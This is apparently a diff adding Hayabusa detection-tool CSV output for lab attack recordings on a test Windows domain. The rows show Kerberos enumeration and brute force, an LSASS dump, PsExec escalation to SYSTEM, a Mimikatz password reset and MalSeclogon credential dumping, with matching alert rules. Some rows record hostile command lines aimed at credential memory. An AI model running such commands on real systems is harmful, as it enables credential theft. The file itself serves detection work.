+2021-12-02 23:48:17.413 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.416 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ytuntsr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.420 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vga | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.423 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tfay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.426 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sef | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.430 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: gsdf | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.433 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sfs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:23.180 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: HealthMailboxf49e2c8 | Svc: krbtgt | IP Addr: ::ffff:10.23.42.16 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-03 21:06:03.488 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.493 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Guest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.497 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: DefaultAccount | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.510 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: krbtgt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:03.847 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:04.904 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: Test-ADM | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:04.910 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:06.986 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: $P51000-50I28MP5JB3E | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.006 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_27d255b6407743b08 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.010 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2b6f1a51ac6c41b2a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.014 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_25e3b4425ffd47aab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.021 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_8b9faa99d83446d1b | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.031 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.035 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.047 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.052 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:07.056 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:11.514 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:11.878 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-03 21:06:12.553 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx
+2021-12-05 05:59:31.403 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:10:40.723 +09:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx
+2021-12-05 06:19:16.741 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.757 +09:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.804 +09:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.913 +09:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:16.929 +09:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 06:19:17.757 +09:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx"
+2021-12-05 07:09:13.666 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.671 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.672 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:13.673 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-05 07:09:18.652 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx
+2021-12-08 02:33:01.409 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.474 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.485 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.616 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
+2021-12-08 02:33:01.636 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx
